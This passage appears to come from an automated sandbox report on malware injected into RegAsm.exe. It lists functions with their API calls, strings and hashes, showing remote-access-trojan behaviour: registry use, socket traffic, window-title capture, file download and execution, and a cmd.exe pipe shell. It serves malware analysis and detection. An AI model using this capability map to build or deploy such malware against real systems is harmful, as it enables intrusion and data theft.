                                                                • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                                Function 0041353A Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C1D7,00466C58), ref: 00413551
                                                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040C1D7,00466C58), ref: 00413565
                                                                • RegCloseKey.KERNEL32(?,?,?,0040C1D7,00466C58), ref: 00413570
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID:
                                                                • API String ID: 3677997916-0
                                                                • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                                • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                                Function 004138B2 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                • RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateValue
                                                                • String ID:
                                                                • API String ID: 1818849710-0
                                                                • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                                • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                                Function 00409E1F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _wcslen
                                                                • String ID: pQG
                                                                • API String ID: 176396367-3769108836
                                                                • Opcode ID: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                                • Opcode Fuzzy Hash: 5581d9da4b44419582c52f90d2dac08d2b870ca85f72c258eca40ba8ececd965
                                                                • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                                Function 0041B847 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B85B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: GlobalMemoryStatus
                                                                • String ID: @
                                                                • API String ID: 1890195054-2766056989
                                                                • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                                                • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                                                • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                                                Function 00446206 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • _free.LIBCMT ref: 00446227
                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap$_free
                                                                • String ID:
                                                                • API String ID: 1482568997-0
                                                                • Opcode ID: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                                                • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                                                                • Opcode Fuzzy Hash: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                                                • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                                                                Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateEventStartupsocket
                                                                • String ID:
                                                                • API String ID: 1953588214-0
                                                                • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                                                • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                                • Opcode Fuzzy Hash: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                                Function 0041BB27 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetForegroundWindow.USER32 ref: 0041BB49
                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Window$ForegroundText
                                                                • String ID:
                                                                • API String ID: 29597999-0
                                                                • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                                                • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                                                Function 00414F24 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,004151C3,00000000,00000001), ref: 00414F46
                                                                • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                                                  • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                  • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                  • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                  • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                  • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                  • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                  • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                  • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                • String ID:
                                                                • API String ID: 1170566393-0
                                                                • Opcode ID: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                                • Instruction ID: 64a5677b7ab27dcaa32d5743096e05a6e92bfc5102e3e8065abb212a99eff034
                                                                • Opcode Fuzzy Hash: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                                • Instruction Fuzzy Hash: 23D017322005316BD320A769AC00AEBAA9EDFD6760B12003BBD08D2251DA949C8286E8
                                                                Function 004118ED Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                • Instruction ID: 3af98ca860494c99acd04ebe2bb4cc6dc665ec8dea8eb108ba88c8789d347e54
                                                                • Opcode Fuzzy Hash: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                • Instruction Fuzzy Hash: 9411E3B27201019FD7149B18C860BA6B766FF50710F5942AAE256CB3B2DB35EC91CA98
                                                                Function 004461B8 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                                • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                                Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Startup
                                                                • String ID:
                                                                • API String ID: 724789610-0
                                                                • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                                                • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                                                Function 004027A7 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Deallocatestd::_
                                                                • String ID:
                                                                • API String ID: 1323251999-0
                                                                • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                                • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                                Function 00426D42 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: recv
                                                                • String ID:
                                                                • API String ID: 1507349165-0
                                                                • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                                                • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                                                Function 00426D59 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: send
                                                                • String ID:
                                                                • API String ID: 2809346765-0
                                                                • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                                                • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                                                                Function 00411CDE Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                                                • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06

                                                                Non-executed Functions

                                                                Function 00407CD2 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                  • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                  • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                  • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                  • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                  • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                  • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                  • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                                                  • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                • API String ID: 1067849700-181434739
                                                                • Opcode ID: 4b7f7d1206543e90f9d43660aaa20adae5c346977114bad7fc5ffa3ba2895adf
                                                                • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                                • Opcode Fuzzy Hash: 4b7f7d1206543e90f9d43660aaa20adae5c346977114bad7fc5ffa3ba2895adf
                                                                • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                                Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                • __Init_thread_footer.LIBCMT ref: 00405723
                                                                • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                                • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660D0,00000062,004660B4), ref: 004059E4
                                                                • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                                • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                • CloseHandle.KERNEL32 ref: 00405A23
                                                                • CloseHandle.KERNEL32 ref: 00405A2B
                                                                • CloseHandle.KERNEL32 ref: 00405A3D
                                                                • CloseHandle.KERNEL32 ref: 00405A45
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                • API String ID: 2994406822-18413064
                                                                • Opcode ID: b2d82c10f2debf51222373f7a3e4651be4bb46aebb09b74c8cfb6043f73c9cfb
                                                                • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
